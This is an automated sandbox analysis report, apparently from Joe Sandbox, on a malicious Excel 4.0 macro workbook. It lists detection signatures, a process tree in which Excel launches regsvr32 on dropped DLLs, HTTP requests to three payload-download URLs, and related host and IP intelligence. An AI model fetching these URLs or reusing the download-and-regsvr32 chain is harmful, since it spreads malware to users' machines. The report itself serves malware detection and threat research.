Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
W-938893460.xlsb

Overview

General Information

Sample Name:W-938893460.xlsb
Analysis ID:608746
MD5:899517f64b531fa84462eb53bd071b50
SHA1:16fa83c16a17cc47bfd5424d60084bf70e2ce266
SHA256:1d7c459e0c8e7201933dec1ae217ba4f148838aca3ad10f9e2ba869d50e57e49
Infos:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Found malicious Excel 4.0 Macro
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Registers a DLL
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Excel Network Connections
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1056 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1036 cmdline: regsvr32 C:\Uduw\ehxw1.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1424 cmdline: regsvr32 C:\Uduw\ehxw2.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1696 cmdline: regsvr32 C:\Uduw\ehxw3.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\Uduw\ehxw1.dll, CommandLine: regsvr32 C:\Uduw\ehxw1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1056, ParentProcessName: EXCEL.EXE, ProcessCommandLine: regsvr32 C:\Uduw\ehxw1.dll, ProcessId: 1036, ProcessName: regsvr32.exe
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 31.22.4.117, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1056, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 31.22.4.117:443 -> 192.168.2.22:49173 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.17.132:443 -> 192.168.2.22:49174 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.62.76:443 -> 192.168.2.22:49175 version: TLS 1.2

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 31.22.4.117:443
    Source: global trafficDNS query: name: maramaabroo.com
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 31.22.4.117:443
    Source: global trafficHTTP traffic detected: GET /XGLCPZf6et/Cvnhfn.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: maramaabroo.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /w2X7dAxp/Cvnhfn.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: natalespatagonia.clConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /5jajRnhLV0/Cvnhfn.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: camarajocaclaudino.pb.gov.brConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: Joe Sandbox ViewIP Address: 31.22.4.117 31.22.4.117
    Source: Joe Sandbox ViewIP Address: 192.185.17.132 192.185.17.132
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B874A.emfJump to behavior
    Source: unknownDNS traffic detected: queries for: maramaabroo.com
    Source: global trafficHTTP traffic detected: GET /XGLCPZf6et/Cvnhfn.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: maramaabroo.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /w2X7dAxp/Cvnhfn.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: natalespatagonia.clConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /5jajRnhLV0/Cvnhfn.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: camarajocaclaudino.pb.gov.brConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 31.22.4.117:443 -> 192.168.2.22:49173 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.17.132:443 -> 192.168.2.22:49174 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.62.76:443 -> 192.168.2.22:49175 version: TLS 1.2

    System Summary

    barindex
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 20 21 (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. U
    Source: Screenshot number: 4Screenshot OCR: Enable Content 27 28 29 G) SECURITY WARNING Macros have been disabled. Enable Content 30 31 32
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 20 21 (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. U
    Source: Screenshot number: 8Screenshot OCR: Enable Content 27 28 29 G) SECURITY WARNING Macros have been disabled. Enable Content 30 31 32
    Source: Screenshot number: 12Screenshot OCR: Enable Editing d 20 21 (D PROTECTED VIEW Be careful - files from the Internet can contain viruses.
    Source: Screenshot number: 12Screenshot OCR: Enable Content 27 28 29 G) SECURITY WARNING Macros have been disabled. Enable Content 30 31 32
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing i PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 1Screenshot OCR: Enable Content CD SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: W-938893460.xlsbMacro extractor: Sheet: PVVEBZ contains: URLDownloadToFileA
    Source: W-938893460.xlsbMacro extractor: Sheet: PVVEBZ contains: URLDownloadToFileA
    Source: W-938893460.xlsbMacro extractor: Sheet: PVVEBZ contains: URLDownloadToFileA
    Source: W-938893460.xlsbMacro extractor: Sheet: PVVEBZ contains: URLDownloadToFileA
    Source: W-938893460.xlsbMacro extractor: Sheet: PVVEBZ contains: URLDownloadToFileA
    Source: W-938893460.xlsbMacro extractor: Sheet: PVVEBZ contains: URLDownloadToFileA
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbInitial sample: EXEC
    Source: W-938893460.xlsbMacro extractor: Sheet name: PVVEBZ
    Source: W-938893460.xlsbMacro extractor: Sheet name: PDGLGF
    Source: W-938893460.xlsbMacro extractor: Sheet name: PDGLGF
    Source: W-938893460.xlsbMacro extractor: Sheet name: Btd
    Source: W-938893460.xlsbMacro extractor: Sheet name: Btd
    Source: W-938893460.xlsbMacro extractor: Sheet name: PVVEBZ
    Source: W-938893460.xlsbMacro extractor: Sheet name: PVVEBZ
    Source: W-938893460.xlsbMacro extractor: Sheet name: PDGLGF
    Source: W-938893460.xlsbMacro extractor: Sheet name: PDGLGF
    Source: W-938893460.xlsbMacro extractor: Sheet name: Btd
    Source: W-938893460.xlsbMacro extractor: Sheet name: Btd
    Source: W-938893460.xlsbMacro extractor: Sheet name: PVVEBZ
    Source: W-938893460.xlsbMacro extractor: Sheet name: PVVEBZ
    Source: W-938893460.xlsbMacro extractor: Sheet name: PDGLGF
    Source: W-938893460.xlsbMacro extractor: Sheet name: PDGLGF
    Source: W-938893460.xlsbMacro extractor: Sheet name: Btd
    Source: W-938893460.xlsbMacro extractor: Sheet name: Btd
    Source: W-938893460.xlsbMacro extractor: Sheet name: PVVEBZ
    Source: W-938893460.xlsbOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: W-938893460.xlsbOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: W-938893460.xlsbOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: 646E.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Uduw\ehxw1.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Uduw\ehxw2.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Uduw\ehxw3.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Uduw\ehxw1.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Uduw\ehxw2.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Uduw\ehxw3.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$W-938893460.xlsbJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR674A.tmpJump to behavior
    Source: classification engineClassification label: mal72.expl.evad.winXLSB@7/5@3/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/_rels/vmlDrawing2.vml.rels
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/_rels/vmlDrawing3.vml.rels
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/_rels/drawing4.xml.rels
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/embeddings/oleObject1.bin
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/drawing2.xml
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/embeddings/oleObject2.bin
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/drawing3.xml
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/vmlDrawing3.vml
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/embeddings/oleObject3.bin
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/drawings/drawing4.xml
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: W-938893460.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: W-938893460.xlsbStatic file information: File size 1057585 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: W-938893460.xlsbInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Uduw\ehxw1.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 1160Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 3012Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2680Thread sleep time: -60000s >= -30000sJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Scripting
    Path Interception1
    Process Injection
    1
    Regsvr32
    OS Credential Dumping1
    Virtualization/Sandbox Evasion
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts23
    Exploitation for Client Execution
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Masquerading
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Disable or Modify Tools
    Security Account Manager2
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Virtualization/Sandbox Evasion
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
    Ingress Tool Transfer
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Process Injection
    LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Scripting
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png0%Avira URL Cloudsafe
    https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    natalespatagonia.cl
    192.185.17.132
    truefalse
      unknown
      camarajocaclaudino.pb.gov.br
      162.241.62.76
      truefalse
        unknown
        maramaabroo.com
        31.22.4.117
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://maramaabroo.com/XGLCPZf6et/Cvnhfn.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.pngfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          31.22.4.117
          maramaabroo.comUnited Kingdom
          34119WILDCARD-ASWildcardUKLimitedGBfalse
          192.185.17.132
          natalespatagonia.clUnited States
          46606UNIFIEDLAYER-AS-1USfalse
          162.241.62.76
          camarajocaclaudino.pb.gov.brUnited States
          46606UNIFIEDLAYER-AS-1USfalse
          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:608746
          Start date and time: 13/04/202216:07:252022-04-13 16:07:25 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 7m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:W-938893460.xlsb
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal72.expl.evad.winXLSB@7/5@3/3
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xlsb
          • Adjust boot time
          • Enable AMSI
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Found warning dialog
          • Click Ok
          • Found warning dialog
          • Click Ok
          • Found warning dialog
          • Click Ok
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, svchost.exe
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • VT rate limit hit for: W-938893460.xlsb
          TimeTypeDescription
          16:08:44API Interceptor3x Sleep call for process: regsvr32.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          31.22.4.117W-706528590.xlsbGet hashmaliciousBrowse
            https://keavamethod.com/as/ermulobaerrGet hashmaliciousBrowse
              W-1178425533.xlsbGet hashmaliciousBrowse
                W-1178425533.xlsbGet hashmaliciousBrowse
                  W-1245276572.xlsbGet hashmaliciousBrowse
                    W-1277599093.xlsbGet hashmaliciousBrowse
                      W-1245276572.xlsbGet hashmaliciousBrowse
                        W-1277599093.xlsbGet hashmaliciousBrowse
                          W-1826010922.xlsbGet hashmaliciousBrowse
                            W-1659917236.xlsbGet hashmaliciousBrowse
                              W-1461729946.xlsbGet hashmaliciousBrowse
                                W-1659917236.xlsbGet hashmaliciousBrowse
                                  W-1826010922.xlsbGet hashmaliciousBrowse
                                    W-433343185.xlsbGet hashmaliciousBrowse
                                      W-433343185.xlsbGet hashmaliciousBrowse
                                        192.185.17.132W-706528590.xlsbGet hashmaliciousBrowse
                                          https://keavamethod.com/as/ermulobaerrGet hashmaliciousBrowse
                                            W-1178425533.xlsbGet hashmaliciousBrowse
                                              W-1178425533.xlsbGet hashmaliciousBrowse
                                                W-1245276572.xlsbGet hashmaliciousBrowse
                                                  W-1277599093.xlsbGet hashmaliciousBrowse
                                                    W-1245276572.xlsbGet hashmaliciousBrowse
                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                        W-1826010922.xlsbGet hashmaliciousBrowse
                                                          W-1659917236.xlsbGet hashmaliciousBrowse
                                                            W-1461729946.xlsbGet hashmaliciousBrowse
                                                              W-1659917236.xlsbGet hashmaliciousBrowse
                                                                W-1826010922.xlsbGet hashmaliciousBrowse
                                                                  W-433343185.xlsbGet hashmaliciousBrowse
                                                                    W-433343185.xlsbGet hashmaliciousBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      camarajocaclaudino.pb.gov.brW-706528590.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1461729946.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      natalespatagonia.clW-706528590.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1461729946.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      maramaabroo.comW-706528590.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1461729946.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      UNIFIEDLAYER-AS-1UShttps://barbeariaprofissional.com/lso/stenierseinfdrpGet hashmaliciousBrowse
                                                                      • 216.172.172.189
                                                                      W-706528590.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      https://atmuedmizwwchacqvncuyazwze-dot-gl3003020300232323.oa.r.appspot.com/#mafisher@archphila.orgGet hashmaliciousBrowse
                                                                      • 162.214.88.17
                                                                      https://keavamethod.com/as/ermulobaerrGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      https://webmail.mpcyber.onlineGet hashmaliciousBrowse
                                                                      • 162.241.123.44
